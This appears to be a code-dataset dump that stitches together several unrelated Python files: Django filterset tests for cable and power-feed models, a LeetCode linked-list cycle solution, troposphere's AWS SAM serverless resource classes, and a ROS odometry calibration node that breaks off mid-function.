class CableTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Cable.objects.all()
filterset = CableFilterSet
@classmethod
def setUpTestData(cls):
sites = (
Site(name='Site 1', slug='site-1'),
Site(name='Site 2', slug='site-2'),
Site(name='Site 3', slug='site-3'),
)
Site.objects.bulk_create(sites)
tenants = (
Tenant(name='Tenant 1', slug='tenant-1'),
Tenant(name='Tenant 2', slug='tenant-2'),
Tenant(name='Tenant 3', slug='tenant-3'),
)
Tenant.objects.bulk_create(tenants)
racks = (
Rack(name='Rack 1', site=sites[0]),
Rack(name='Rack 2', site=sites[1]),
Rack(name='Rack 3', site=sites[2]),
)
Rack.objects.bulk_create(racks)
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], rack=racks[0], position=1),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[0], rack=racks[0], position=2),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[1], rack=racks[1], position=1),
Device(name='Device 4', device_type=device_type, device_role=device_role, site=sites[1], rack=racks[1], position=2),
Device(name='Device 5', device_type=device_type, device_role=device_role, site=sites[2], rack=racks[2], position=1),
Device(name='Device 6', device_type=device_type, device_role=device_role, site=sites[2], rack=racks[2], position=2),
)
Device.objects.bulk_create(devices)
interfaces = (
Interface(device=devices[0], name='Interface 1', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[0], name='Interface 2', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[1], name='Interface 3', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[1], name='Interface 4', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[2], name='Interface 5', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[2], name='Interface 6', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[3], name='Interface 7', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[3], name='Interface 8', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[4], name='Interface 9', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[4], name='Interface 10', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[5], name='Interface 11', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
Interface(device=devices[5], name='Interface 12', type=InterfaceTypeChoices.TYPE_1GE_FIXED),
)
Interface.objects.bulk_create(interfaces)
console_port = ConsolePort.objects.create(device=devices[0], name='Console Port 1')
console_server_port = ConsoleServerPort.objects.create(device=devices[0], name='Console Server Port 1')
# Cables
Cable(termination_a=interfaces[1], termination_b=interfaces[2], label='Cable 1', type=CableTypeChoices.TYPE_CAT3, tenant=tenants[0], status=LinkStatusChoices.STATUS_CONNECTED, color='aa1409', length=10, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[3], termination_b=interfaces[4], label='Cable 2', type=CableTypeChoices.TYPE_CAT3, tenant=tenants[0], status=LinkStatusChoices.STATUS_CONNECTED, color='aa1409', length=20, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[5], termination_b=interfaces[6], label='Cable 3', type=CableTypeChoices.TYPE_CAT5E, tenant=tenants[1], status=LinkStatusChoices.STATUS_CONNECTED, color='f44336', length=30, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[7], termination_b=interfaces[8], label='Cable 4', type=CableTypeChoices.TYPE_CAT5E, tenant=tenants[1], status=LinkStatusChoices.STATUS_PLANNED, color='f44336', length=40, length_unit=CableLengthUnitChoices.UNIT_FOOT).save()
Cable(termination_a=interfaces[9], termination_b=interfaces[10], label='Cable 5', type=CableTypeChoices.TYPE_CAT6, tenant=tenants[2], status=LinkStatusChoices.STATUS_PLANNED, color='e91e63', length=10, length_unit=CableLengthUnitChoices.UNIT_METER).save()
Cable(termination_a=interfaces[11], termination_b=interfaces[0], label='Cable 6', type=CableTypeChoices.TYPE_CAT6, tenant=tenants[2], status=LinkStatusChoices.STATUS_PLANNED, color='e91e63', length=20, length_unit=CableLengthUnitChoices.UNIT_METER).save()
Cable(termination_a=console_port, termination_b=console_server_port, label='Cable 7').save()
def test_label(self):
params = {'label': ['Cable 1', 'Cable 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_length(self):
params = {'length': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_length_unit(self):
params = {'length_unit': CableLengthUnitChoices.UNIT_FOOT}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_type(self):
params = {'type': [CableTypeChoices.TYPE_CAT3, CableTypeChoices.TYPE_CAT5E]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_status(self):
params = {'status': [LinkStatusChoices.STATUS_CONNECTED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'status': [LinkStatusChoices.STATUS_PLANNED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
def test_color(self):
params = {'color': ['aa1409', 'f44336']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_rack(self):
racks = Rack.objects.all()[:2]
params = {'rack_id': [racks[0].pk, racks[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'rack': [racks[0].name, racks[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
def test_site(self):
site = Site.objects.all()[:2]
params = {'site_id': [site[0].pk, site[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
params = {'site': [site[0].slug, site[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 6)
def test_tenant(self):
tenant = Tenant.objects.all()[:2]
params = {'tenant_id': [tenant[0].pk, tenant[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
params = {'tenant': [tenant[0].slug, tenant[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 4)
def test_termination_types(self):
params = {'termination_a_type': 'dcim.consoleport'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'termination_b_type': 'dcim.consoleserverport'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_termination_ids(self):
interface_ids = Cable.objects.values_list('termination_a_id', flat=True)[:3]
params = {
'termination_a_type': 'dcim.interface',
'termination_a_id': list(interface_ids),
}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 3)
class PowerPanelTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerPanel.objects.all()
filterset = PowerPanelFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
power_panels = (
PowerPanel(name='Power Panel 1', site=sites[0], location=locations[0]),
PowerPanel(name='Power Panel 2', site=sites[1], location=locations[1]),
PowerPanel(name='Power Panel 3', site=sites[2], location=locations[2]),
)
PowerPanel.objects.bulk_create(power_panels)
def test_name(self):
params = {'name': ['Power Panel 1', 'Power Panel 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PowerFeedTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerFeed.objects.all()
filterset = PowerFeedFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
racks = (
Rack(name='Rack 1', site=sites[0]),
Rack(name='Rack 2', site=sites[1]),
Rack(name='Rack 3', site=sites[2]),
)
Rack.objects.bulk_create(racks)
power_panels = (
PowerPanel(name='Power Panel 1', site=sites[0]),
PowerPanel(name='Power Panel 2', site=sites[1]),
PowerPanel(name='Power Panel 3', site=sites[2]),
)
PowerPanel.objects.bulk_create(power_panels)
power_feeds = (
PowerFeed(power_panel=power_panels[0], rack=racks[0], name='Power Feed 1', status=PowerFeedStatusChoices.STATUS_ACTIVE, type=PowerFeedTypeChoices.TYPE_PRIMARY, supply=PowerFeedSupplyChoices.SUPPLY_AC, phase=PowerFeedPhaseChoices.PHASE_3PHASE, voltage=100, amperage=100, max_utilization=10),
PowerFeed(power_panel=power_panels[1], rack=racks[1], name='Power Feed 2', status=PowerFeedStatusChoices.STATUS_FAILED, type=PowerFeedTypeChoices.TYPE_PRIMARY, supply=PowerFeedSupplyChoices.SUPPLY_AC, phase=PowerFeedPhaseChoices.PHASE_3PHASE, voltage=200, amperage=200, max_utilization=20),
PowerFeed(power_panel=power_panels[2], rack=racks[2], name='Power Feed 3', status=PowerFeedStatusChoices.STATUS_OFFLINE, type=PowerFeedTypeChoices.TYPE_REDUNDANT, supply=PowerFeedSupplyChoices.SUPPLY_DC, phase=PowerFeedPhaseChoices.PHASE_SINGLE, voltage=300, amperage=300, max_utilization=30),
)
PowerFeed.objects.bulk_create(power_feeds)
manufacturer = Manufacturer.objects.create(name='Manufacturer', slug='manufacturer')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model', slug='model')
device_role = DeviceRole.objects.create(name='Device Role', slug='device-role')
device = Device.objects.create(name='Device', device_type=device_type, device_role=device_role, site=sites[0])
power_ports = [
PowerPort(device=device, name='Power Port 1'),
PowerPort(device=device, name='Power Port 2'),
]
PowerPort.objects.bulk_create(power_ports)
Cable(termination_a=power_feeds[0], termination_b=power_ports[0]).save()
Cable(termination_a=power_feeds[1], termination_b=power_ports[1]).save()
def test_name(self):
params = {'name': ['Power Feed 1', 'Power Feed 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [PowerFeedStatusChoices.STATUS_ACTIVE, PowerFeedStatusChoices.STATUS_FAILED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': PowerFeedTypeChoices.TYPE_PRIMARY}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_supply(self):
params = {'supply': PowerFeedSupplyChoices.SUPPLY_AC}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_phase(self):
params = {'phase': PowerFeedPhaseChoices.PHASE_3PHASE}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_voltage(self):
params = {'voltage': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_amperage(self):
params = {'amperage': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_max_utilization(self):
params = {'max_utilization': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_power_panel_id(self):
power_panels = PowerPanel.objects.all()[:2]
params = {'power_panel_id': [power_panels[0].pk, power_panels[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rack_id(self):
racks = Rack.objects.all()[:2]
params = {'rack_id': [racks[0].pk, racks[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
# TODO: Connection filters
| 48.240655
| 390
| 0.644821
|
8031fae69c226f98a26544a13f909b1f9cb52871
| 536
|
py
|
Python
|
python/141_linked_list_cycle.py
|
Tyler314/leetcode
|
53aaee13adfb91ae2f85f2db0208ddd94d81f643
|
[
"MIT"
] | null | null | null |
python/141_linked_list_cycle.py
|
Tyler314/leetcode
|
53aaee13adfb91ae2f85f2db0208ddd94d81f643
|
[
"MIT"
] | null | null | null |
python/141_linked_list_cycle.py
|
Tyler314/leetcode
|
53aaee13adfb91ae2f85f2db0208ddd94d81f643
|
[
"MIT"
] | null | null | null |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head:
return False
slow = head
fast = head.next
while fast and fast.next:
if slow == fast:
return True
slow = slow.next
fast = fast.next.next
return False
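# --- Hedged usage sketch (editor's addition, not part of the original
# solution). It builds a three-node list with and without a cycle, using a
# local ListNode that mirrors the commented-out LeetCode definition above.
if __name__ == '__main__':
    class ListNode(object):
        def __init__(self, x):
            self.val = x
            self.next = None

    a, b, c = ListNode(1), ListNode(2), ListNode(3)
    a.next, b.next, c.next = b, c, a   # 1 -> 2 -> 3 -> back to 1
    assert Solution().hasCycle(a)
    c.next = None                      # break the cycle
    assert not Solution().hasCycle(a)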
| 24.363636
| 36
| 0.496269
|
7b64dcc0445d600224b0b28414fb018d11bc5bc5
| 6,092
|
py
|
Python
|
troposphere/serverless.py
|
ridha/troposphere
|
4dc132c1816f1903ba71a27070c27fdb010f486c
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/serverless.py
|
ridha/troposphere
|
4dc132c1816f1903ba71a27070c27fdb010f486c
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/serverless.py
|
ridha/troposphere
|
4dc132c1816f1903ba71a27070c27fdb010f486c
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2017, Fernando Freire <fernando.freire@nike.com>
# All rights reserved.
#
# See LICENSE file for full license.
import types
from . import AWSObject, AWSProperty
from .awslambda import Environment, VPCConfig, validate_memory_size
from .dynamodb import ProvisionedThroughput, SSESpecification
from .s3 import Filter
from .validators import exactly_one, positive_integer
try:
from awacs.aws import PolicyDocument
policytypes = (dict, list, basestring, PolicyDocument)
except ImportError:
policytypes = (dict, list, basestring)
assert types # silence pyflakes
def primary_key_type_validator(x):
valid_types = ["String", "Number", "Binary"]
if x not in valid_types:
raise ValueError("KeyType must be one of: %s" % ", ".join(valid_types))
return x
class DeadLetterQueue(AWSProperty):
props = {
'Type': (basestring, False),
'TargetArn': (basestring, False)
}
def validate(self):
valid_types = ['SQS', 'SNS']
if ('Type' in self.properties and
self.properties['Type'] not in valid_types):
raise ValueError('Type must be either SQS or SNS')
class S3Location(AWSProperty):
props = {
"Bucket": (basestring, True),
"Key": (basestring, True),
"Version": (basestring, False)
}
class Hooks(AWSProperty):
props = {
"PreTraffic": (basestring, False),
"PostTraffic": (basestring, False)
}
class DeploymentPreference(AWSProperty):
props = {
"Type": (basestring, True),
"Alarms": (list, False),
"Hooks": (Hooks, False),
"Enabled": (bool, False)
}
class Function(AWSObject):
resource_type = "AWS::Serverless::Function"
props = {
'Handler': (basestring, True),
'Runtime': (basestring, True),
'CodeUri': ((S3Location, basestring), True),
'FunctionName': (basestring, False),
'Description': (basestring, False),
'MemorySize': (validate_memory_size, False),
'Timeout': (positive_integer, False),
'Role': (basestring, False),
'Policies': (policytypes, False),
'Environment': (Environment, False),
'VpcConfig': (VPCConfig, False),
'Events': (dict, False),
'Tags': (dict, False),
'Tracing': (basestring, False),
'KmsKeyArn': (basestring, False),
'DeadLetterQueue': (DeadLetterQueue, False),
'AutoPublishAlias': (basestring, False),
'DeploymentPreference': (DeploymentPreference, False)
}
class FunctionForPackaging(Function):
"""Render Function without requiring 'CodeUri'.
This exception to the Function spec is for use with the
`cloudformation/sam package` commands which add CodeUri automatically.
"""
resource_type = Function.resource_type
props = Function.props.copy()
props['CodeUri'] = (props['CodeUri'][0], False)
class Api(AWSObject):
resource_type = "AWS::Serverless::Api"
props = {
'StageName': (basestring, True),
'Name': (basestring, False),
'DefinitionBody': (dict, False),
'DefinitionUri': (basestring, False),
'CacheClusterEnabled': (bool, False),
'CacheClusterSize': (basestring, False),
'Variables': (dict, False),
}
def validate(self):
conds = [
'DefinitionBody',
'DefinitionUri',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class PrimaryKey(AWSProperty):
props = {
'Name': (basestring, False),
'Type': (primary_key_type_validator, False)
}
class SimpleTable(AWSObject):
resource_type = "AWS::Serverless::SimpleTable"
props = {
'PrimaryKey': (PrimaryKey, False),
'ProvisionedThroughput': (ProvisionedThroughput, False),
'SSESpecification': (SSESpecification, False),
'Tags': (dict, False),
'TableName': (basestring, False),
}
class S3Event(AWSObject):
resource_type = 'S3'
props = {
'Bucket': (basestring, True),
'Events': (list, True),
'Filter': (Filter, False)
}
class SNSEvent(AWSObject):
resource_type = 'SNS'
props = {
'Topic': (basestring, True)
}
def starting_position_validator(x):
valid_types = ['TRIM_HORIZON', 'LATEST']
if x not in valid_types:
raise ValueError(
"StartingPosition must be one of: %s"
% ", ".join(valid_types)
)
return x
class KinesisEvent(AWSObject):
resource_type = 'Kinesis'
props = {
'Stream': (basestring, True),
'StartingPosition': (starting_position_validator, True),
'BatchSize': (positive_integer, False)
}
class DynamoDBEvent(AWSObject):
resource_type = 'DynamoDB'
props = {
'Stream': (basestring, True),
'StartingPosition': (starting_position_validator, True),
'BatchSize': (positive_integer, False)
}
class ApiEvent(AWSObject):
resource_type = 'Api'
props = {
'Path': (basestring, True),
'Method': (basestring, True),
'RestApiId': (basestring, False)
}
class ScheduleEvent(AWSObject):
resource_type = 'Schedule'
props = {
'Schedule': (basestring, True),
'Input': (basestring, False)
}
class CloudWatchEvent(AWSObject):
resource_type = 'CloudWatchEvent'
props = {
'Pattern': (dict, True),
'Input': (basestring, False),
'InputPath': (basestring, False)
}
class IoTRuleEvent(AWSObject):
resource_type = 'IoTRule'
props = {
'Sql': (basestring, True),
'AwsIotSqlVersion': (basestring, False)
}
class AlexaSkillEvent(AWSObject):
resource_type = 'AlexaSkill'
props = {}
class SQSEvent(AWSObject):
resource_type = 'SQS'
props = {
'Queue': (basestring, True),
'BatchSize': (positive_integer, True)
}
def validate(self):
if (not 1 <= self.properties['BatchSize'] <= 10):
raise ValueError('BatchSize must be between 1 and 10')
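# --- Hedged usage sketch (editor's addition, not part of the original
# module). It renders a minimal template containing one serverless Function;
# the resource title, handler, runtime and S3 CodeUri are illustrative
# placeholders, and a real SAM template would also declare the
# AWS::Serverless-2016-10-31 transform.
if __name__ == '__main__':
    from troposphere import Template

    t = Template()
    t.add_resource(Function(
        "HelloFunction",
        Handler="index.handler",
        Runtime="python3.6",
        CodeUri="s3://example-bucket/hello.zip",
    ))
    print(t.to_json())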
| 24.764228
| 79
| 0.613592
|
84657645a40f507e88db6fc69aa43a19d2c14048
| 8,112
|
py
|
Python
|
waypoint_nav/src/encoder_waypoint_localization.py
|
marcinolokk/DTU-R3-ROS
|
310f7dc6fbd53b49504112aabc2d5cac4c768660
|
[
"BSD-3-Clause"
] | 2
|
2018-09-19T08:39:51.000Z
|
2019-08-07T15:55:49.000Z
|
waypoint_nav/src/encoder_waypoint_localization.py
|
marcinolokk/DTU-R3-ROS
|
310f7dc6fbd53b49504112aabc2d5cac4c768660
|
[
"BSD-3-Clause"
] | null | null | null |
waypoint_nav/src/encoder_waypoint_localization.py
|
marcinolokk/DTU-R3-ROS
|
310f7dc6fbd53b49504112aabc2d5cac4c768660
|
[
"BSD-3-Clause"
] | 6
|
2018-06-08T12:12:16.000Z
|
2019-12-11T13:21:13.000Z
|
#!/usr/bin/env python
import rospy
import math
from pyproj import Proj
from R3_functions import quat_rot, fit_in_rad, debug_info
from bisect import bisect_left
# TF libraries
import tf
import tf2_ros
import tf2_msgs.msg
import tf2_geometry_msgs
# ROS messages
from std_msgs.msg import String
from sensor_msgs.msg import NavSatFix
from nav_msgs.msg import Odometry
from geometry_msgs.msg import Pose, PoseStamped, TransformStamped
# Class
class encoder_localization(object):
def __init__(self):
# Init ROS node
rospy.init_node('encoder_waypoint_localization')
self.verify_stamp = rospy.Time.now()
# Variables
self.projection = Proj(proj="utm", zone="34", ellps='WGS84')
self.tfBuffer = tf2_ros.Buffer()
self.tf_listener = tf2_ros.TransformListener(self.tfBuffer)
self.robot_odom = Odometry()
self.odom_list = [[],[]] # a list contains timestamp list and odom_pose list
self.odom_calibrating = False
self.list_cleaning = False
# rosparams
self.robot_frame = rospy.get_param("~waypoint_control/base_frame", "base_footprint")
self.gps_frame = rospy.get_param("~waypoint_control/gps_frame", "utm")
self.odom_frame = rospy.get_param("~waypoint_control/odom_frame", "odom")
# Publishers
self.robot_gps_pub = rospy.Publisher('robot_gps_pose', Odometry, queue_size = 10)
self.tf_pub = rospy.Publisher("tf", tf2_msgs.msg.TFMessage, queue_size=20, latch = True)
self.tf2_pub = rospy.Publisher("tf_static", tf2_msgs.msg.TFMessage, queue_size=20, latch = True)
self.debug_output = rospy.Publisher('debug_output', String, queue_size = 10)
# Subscribers
rospy.Subscriber('odo_calib_pose', Odometry, self.poseCB)
rospy.Subscriber('odom', Odometry, self.odomCB)
self.freq = 10
self.rate = rospy.Rate(self.freq)
def Start(self):
while not rospy.is_shutdown():
self.rate.sleep()
# ROS Callback functions
def poseCB(self, p):
self.odom_calibrating = True
robot_pose = Pose()
robot_pose = p.pose.pose
robot_pose.position.x, robot_pose.position.y = self.projection(p.pose.pose.position.x, p.pose.pose.position.y)
robot_pose.orientation.x = -p.pose.pose.orientation.x
robot_pose.orientation.y = -p.pose.pose.orientation.y
robot_pose.orientation.z = -p.pose.pose.orientation.z
robot_pose.orientation = quat_rot(robot_pose.orientation,0,0,90)
debug_info(self.debug_output, "Odom calib tf received")
# Align odometry with odom_calib and calculate offset
current_stamp = p.header.stamp
if len(self.odom_list[1]) <= 0:
return
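    # bisect_left finds the first buffered odometry sample whose timestamp is
    # not older than the calibration stamp; the clamp below covers the case
    # where the calibration stamp is newer than every buffered sample.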
i = bisect_left(self.odom_list[0], current_stamp)
if i >= len(self.odom_list[1]):
i = len(self.odom_list[1]) - 1
current_euler = tf.transformations.euler_from_quaternion((self.robot_odom.pose.pose.orientation.x, self.robot_odom.pose.pose.orientation.y, self.robot_odom.pose.pose.orientation.z, self.robot_odom.pose.pose.orientation.w))
bench_euler = tf.transformations.euler_from_quaternion((self.odom_list[1][i].orientation.x, self.odom_list[1][i].orientation.y, self.odom_list[1][i].orientation.z, self.odom_list[1][i].orientation.w))
offset_odom_x = self.robot_odom.pose.pose.position.x - self.odom_list[1][i].position.x
offset_odom_y = self.robot_odom.pose.pose.position.y - self.odom_list[1][i].position.y
offset_odom_z = self.robot_odom.pose.pose.position.z - self.odom_list[1][i].position.z
offset_odom_rz = current_euler[2] - bench_euler[2]
    # Remove outdated elements after calculating the offset
self.list_cleaning = True
self.odom_list[0] = self.odom_list[0][i+1:]
self.odom_list[1] = self.odom_list[1][i+1:]
self.list_cleaning = False
try:
odo_utm_trans = self.tfBuffer.lookup_transform(self.gps_frame, self.odom_frame, rospy.Time())
odo_utm_euler = tf.transformations.euler_from_quaternion((odo_utm_trans.transform.rotation.x, odo_utm_trans.transform.rotation.y, odo_utm_trans.transform.rotation.z, odo_utm_trans.transform.rotation.w))
theta = odo_utm_euler[2]
robot_pose.position.x += offset_odom_x * math.cos(theta) - offset_odom_y * math.sin(theta)
robot_pose.position.y += offset_odom_x * math.sin(theta) + offset_odom_y * math.cos(theta)
robot_pose.position.z += offset_odom_z
robot_pose.orientation = quat_rot(robot_pose.orientation,0,0,math.degrees(offset_odom_rz))
debug_info(self.debug_output, "Odometry offset calculated")
except:
debug_info(self.debug_output, "Initialise odometry frame in utm")
# odom to reference
while True:
try:
odo_ref_trans = self.tfBuffer.lookup_transform(self.robot_frame, self.odom_frame, rospy.Time())
tf_odo_ref = TransformStamped()
tf_odo_ref.header.frame_id = "odom_utm_calib"
tf_odo_ref.child_frame_id = self.odom_frame
tf_odo_ref.header.stamp = rospy.Time.now()
tf_odo_ref.transform = odo_ref_trans.transform
tfmsg_odo_ref = tf2_msgs.msg.TFMessage([tf_odo_ref])
self.tf_pub.publish(tfmsg_odo_ref)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
debug_info(self.debug_output, "Publishing odometry calibration")
continue
# reference to utm
tf_ref_utm = TransformStamped()
tf_ref_utm.header.frame_id = self.gps_frame
tf_ref_utm.child_frame_id = "odom_utm_calib"
tf_ref_utm.header.stamp = rospy.Time.now()
tf_ref_utm.transform.translation.x = robot_pose.position.x
tf_ref_utm.transform.translation.y = robot_pose.position.y
tf_ref_utm.transform.translation.z = robot_pose.position.z
tf_ref_utm.transform.rotation = robot_pose.orientation
tfmsg_ref_utm = tf2_msgs.msg.TFMessage([tf_ref_utm])
self.tf2_pub.publish(tfmsg_ref_utm)
self.rate.sleep()
# Check the tf exists correctly
try:
trans = self.tfBuffer.lookup_transform(self.gps_frame, "odom_utm_calib", rospy.Time())
trans2 = self.tfBuffer.lookup_transform("odom_utm_calib", self.odom_frame, rospy.Time())
if math.fabs(trans.transform.translation.x - robot_pose.position.x) > 0.1 or math.fabs(trans.transform.translation.y - robot_pose.position.y) > 0.1:
continue
self.odom_calibrating = False
debug_info(self.debug_output, "Odometry calibrated")
break
except:
continue
self.verify_stamp = tf_odo_ref.header.stamp
def odomCB(self, odo):
self.robot_odom = odo
if not self.list_cleaning:
self.odom_list[0].append(odo.header.stamp)
self.odom_list[1].append(odo.pose.pose)
if self.odom_calibrating:
self.rate.sleep()
return
try:
trans = self.tfBuffer.lookup_transform(self.gps_frame, self.odom_frame, rospy.Time())
if self.verify_stamp > trans.header.stamp:
debug_info(self.debug_output, "Looking up transformations")
return
robot_odom_pose = PoseStamped()
robot_odom_pose.pose = self.robot_odom.pose.pose
pose_transformed = tf2_geometry_msgs.do_transform_pose(robot_odom_pose, trans)
robot_gps_pose = Odometry()
robot_gps_pose.header.frame_id = self.gps_frame
robot_gps_pose.child_frame_id = self.robot_frame
robot_gps_pose.pose.pose = pose_transformed.pose
robot_gps_pose.pose.pose.position.x,robot_gps_pose.pose.pose.position.y = self.projection(pose_transformed.pose.position.x,pose_transformed.pose.position.y,inverse=True)
robot_gps_pose.pose.pose.orientation.x = -pose_transformed.pose.orientation.x
robot_gps_pose.pose.pose.orientation.y = -pose_transformed.pose.orientation.y
robot_gps_pose.pose.pose.orientation.z = -pose_transformed.pose.orientation.z
robot_gps_pose.pose.pose.orientation = quat_rot(robot_gps_pose.pose.pose.orientation,0,0,90)
